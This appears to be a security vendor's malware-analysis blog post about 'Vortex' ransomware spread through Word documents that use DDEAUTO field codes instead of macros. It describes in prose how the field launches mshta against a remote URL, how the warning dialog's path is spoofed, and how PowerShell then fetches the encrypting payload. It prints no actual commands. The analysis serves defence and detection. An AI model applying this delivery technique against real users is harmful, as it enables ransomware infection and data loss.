DDE Ransomware in a Macro-less Word Document

Malware Family: Vortex

SHA256 Hash Value


View the Full VMRay Analyzer Report

Macros in Microsoft Office have been used extensively by malware authors as a mechanism to download and execute a malicious payload on a system. Defensive measures introduced by Microsoft such as disabling macros by default have not stopped malware authors as they continue to devise social engineering techniques to convince users to enable macros thereby allowing malware to perform malicious actions. However, with email gateways and other security products incorporating VBA filtering policies for MS Office documents, malware authors are using new techniques to deliver and execute malicious payloads in Microsoft Office applications.

Dynamic Data Exchange (DDE)

One technique is the use of Dynamic Data Exchange (DDE) – a protocol that allows Windows applications to share data. In this blog post, we will take a closer look at a ransomware sample that uses DDE to execute an application directly from MS Word without any macros. This technique allows malware to easily bypass security systems or email gateways with macro filtering.

Microsoft defines DDE as a set of messages and guidelines that allows applications to share data. Microsoft documentation explains that applications can use the DDE protocol for one-time data transfers for applications to send updates to one another as new data becomes available.

Malware authors take advantage of this technique because it allows external applications to be specified as a DDE data source.  Word will execute these applications to retrieve information. Adding an external data source can be done by inserting a Field, manually changing its Field Code to DDEAUTO and appending the application path as well as additional parameters (Figure 1)

Launching and Executing an external application - DDE Ransomware
Figure 1: Launching and executing an external application using DDE

Depending on the security settings in Word, one of two warnings will be displayed whenever DDE commands are executed in a Word document (Figures 2 and 3).

Typical Warning Message - DDE Ransomware
Figure 2: Typical warning message associated with DDE commands (1/2)
Warning Message DDE Commands - DDE Ransomware
Figure 3: Typical warning message associated with DDE commands (2/2)

Please note that while the second warning message (Figure 3) may raise suspicion, it is easy for a malware author to change the real path to the executable in the message to make it seem innocuous.

Analysis of a Ransomware Sample Using DDE

The ransomware sample that we analyzed is embedded with the DDEAUTO command. The command is automatically executed by Word when the document is opened. It provides the full path of the executable as well as the arguments that need to be passed.Full Path of Executable - DDE Ransomware

In this case, the sample executes mshta.exe with an external URL as shown in Figure 4.

DDEAUTO Command - DDE Ransomware
Figure 4: DDEAUTO command in the Word document to launch an executable

The path of the mshta executable is specified in this way because it tricks Word into thinking that MSword.exe is the target application as shown in Figure 5.

Target Application - DDE Ransomware
Figure 5: Word Document thinking MSword.exe is the target application

The HTA file contains encoded JavaScript which executes cmd.exe and proceeds to execute PowerShell. PowerShell then downloads and executes nvss.exe which contains the ransomware.

Ransomware Sample Behavior

The first action performed by the ransomware is to establish a connection with the C&C server and share the victim’s IP address and other information. This is highlighted in the behavior section of the VMRay Analyzer analysis report (Figure 6)

Ransomware Shares User Information - DDE Ransomware
Figure 6: VMRay Analysis Report: Ransomware shares user information including IP address with C&C server

The second request to the C&C server returns data that is saved in .bat file which is later executed by the malware (Figures 7 and 8).

VMRay Analyzer Log Files & Report - DDE Ransomware
Figure 7: VMRay Analyzer log files and report: C&C server returns .bat file which is executed by the malware
Execution .bat File - DDE Ransomware
Figure 8: Execution of .bat file by the ransomware sample

The next action is to download the encryption key from the C&C server (Figure 9). This key will subsequently be used in an encryption routine that encrypts all the files on the user’s system. The sample reads each file on the system, creates a new one (ending with .aes), writes the encrypted version of the file and finally deletes the original file (Figure 10).

Encryption Key Downloaded - DDE Ransomware
Figure 9: VMRay Analyzer Report: Encryption key downloaded from the C&C server
File Encryption Performed - DDE Ransomware
Figure 10: VMRay Analyzer Report: File Encryption performed by the ransomware sample

Finally, the ransomware sample creates a “How to recover your files” text file in every directory of the user’s system (Figure 11).

How to Recover your Data - DDE Ransomware
Figure 11: ‘How to recover your data’ text file created by the ransomware

VMRay Analyzer Results

While AV vendors have been slow to detect this new technique (Figure 12), VMRay’s agentless hypervisor-based dynamic analysis engine scored the file 100/100 with a severity label of ‘Malicious’. Several malicious behavior patterns are detected (Figure 13) and the detailed behavior of the sample (including the network activity) is also recorded in the Behavior section of the report.

VirusTotal Score - DDE Ransomware
Figure 12: AV engines have been slow to detect the DDE technique used by malware authors
VTI Score - DDE Ransomware
Figure 13: High-Level VMRay Analysis results for the DDE ransomware sample

An important point to note is that Sensepost reported the vulnerability to Microsoft back in August 2017. Microsoft responded that no further action will be taken, and it will be considered for a next-version candidate bug.

View the full VMRay Analyzer Report for DDE Ransomware